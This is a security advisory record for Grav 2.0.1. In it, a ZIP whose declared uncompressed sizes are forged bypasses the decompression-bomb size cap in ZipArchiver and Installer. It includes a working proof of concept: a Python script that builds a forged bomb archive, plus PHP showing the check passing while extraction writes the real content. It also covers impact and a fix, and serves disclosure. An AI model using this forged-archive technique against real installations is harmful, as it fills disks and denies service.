{"id":"GHSA-8h9x-89f2-m7x3","summary":"Grav: Decompression-bomb size cap bypassed by forged ZIP size in ZipArchiver/Installer","details":"### Summary\n\nThe decompression-bomb bound added in 2.0.1 (commit 1c1003c) sums `ZipArchive::statIndex($i)['size']` and rejects an archive whose declared uncompressed total exceeds `system.gpm.archive.max_uncompressed_size` (default 1 GiB) before extracting (`ZipArchiver.php:77-86`; same logic in `GPM\\Installer::unZip` at `Installer.php:228-238`). `statIndex()['size']` is the uncompressed size declared in the ZIP central directory, which is attacker-forgeable and is not checked against the actual inflated stream. An archive declaring 1 byte per entry passes the cap while `extractTo()` writes the real (large) content. The entry-count and nesting-depth caps count real structure and still hold; only the size dimension is defeated, so the disk-fill / inode-exhaustion case the bound targets is not prevented. Incomplete fix for GHSA-928x-9mpw-8h56.\n\n### Details\n\n`extract()`/`unZip()` validate every entry up front, then call `Folder::create` + `extractTo`. The size check is:\n\n```php\n$totalSize += (int) $stat['size'];          // declared central-directory size\nif ($maxSize \u003e 0 && $totalSize \u003e $maxSize) { ... reject ... }\n```\n\n`$stat['size']` is read from the central directory, which the archive author writes. libzip does not cross-check declared-vs-actual size during `extractTo`, so a forged-small value passes the gate and the real stream inflates to disk. The `max_files` (entry count) and `max_depth` (entry-name segments) checks are not forgeable this way.\n\n### PoC\n\nBuild a 10 KiB deflate ZIP of 10 MiB of zeros, patch both uncompressed-size fields (local header + central directory) to 1:\n\n```python\nimport zipfile, struct\ndata = b'\\x00' * (10*1024*1024)\nwith zipfile.ZipFile('bomb.zip','w',zipfile.ZIP_DEFLATED) as z:\n    z.writestr('big.bin', data)\nraw = bytearray(open('bomb.zip','rb').read())\nraw = raw.replace(struct.pack('\u003cI', 10*1024*1024), struct.pack('\u003cI', 1))\nopen('bomb_forged.zip','wb').write(raw)\n```\n\nDrive the exact pre-extraction loop, then extract:\n\n```php\n$zip = new ZipArchive(); $zip-\u003eopen('bomb_forged.zip');\n$total = 0;\nfor ($i = 0; $i \u003c $zip-\u003ecount(); $i++) { $total += (int) $zip-\u003estatIndex($i)['size']; }\n// =\u003e $total === 1   (what the 1 GiB bound checks: PASSES)\n$zip-\u003eextractTo('/tmp/zout');\n// =\u003e filesize('/tmp/zout/big.bin') === 10485760   (written despite the cap)\n```\n\nVerified on Grav 2.0.1 (6f619f0ae), PHP 8.4.22, libzip 1.7.3.\n\n### Impact\n\nA forged archive fills the disk / exhausts inodes during extraction. Reached via `GPM\\Installer::unZip` (`gpm install` / `direct-install` / `self-upgrade`) and admin backup restore (`ZipArchiver::extract`). The archive bytes come from a package source or an admin upload, so the actor sits at admin/operator trust and a consented malicious package already has worse primitives.\n\n### Fix\n\n`ZipArchiver.php:77-86` and `Installer.php:228-238`: don't trust the declared size. Extract each entry through a counting stream (`ZipArchive::getStream` + `fread` loop) and abort once cumulative written bytes pass `max_uncompressed_size`, leaving nothing on disk; or check on-disk bytes incrementally during extraction. If the pre-pass stays, treat the declared-size sum as advisory and add the streamed byte counter as the real enforcement. `max_files` and `max_depth` remain effective.","aliases":["CVE-2026-61449"],"modified":"2026-09-17T15:00:05.915123836Z","published":"2026-09-17T14:53:33Z","database_specific":{"cwe_ids":[],"severity":"MODERATE","github_reviewed":true,"github_reviewed_at":"2026-09-17T14:53:33Z","nvd_published_at":"2026-07-15T17:16:52Z"},"references":[{"type":"WEB","url":"https://github.com/getgrav/grav/security/advisories/GHSA-8h9x-89f2-m7x3"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-61449"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-61841"},{"type":"PACKAGE","url":"https://github.com/getgrav/grav"},{"type":"WEB","url":"https://www.vulncheck.com/advisories/grav-before-decompression-bomb-via-forged-zip-size"}],"affected":[{"package":{"name":"getgrav/grav","ecosystem":"Packagist","purl":"pkg:composer/getgrav/grav"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"2.0.1"},{"fixed":"2.0.2"}]}],"versions":["2.0.1"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/09/GHSA-8h9x-89f2-m7x3/GHSA-8h9x-89f2-m7x3.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"}]}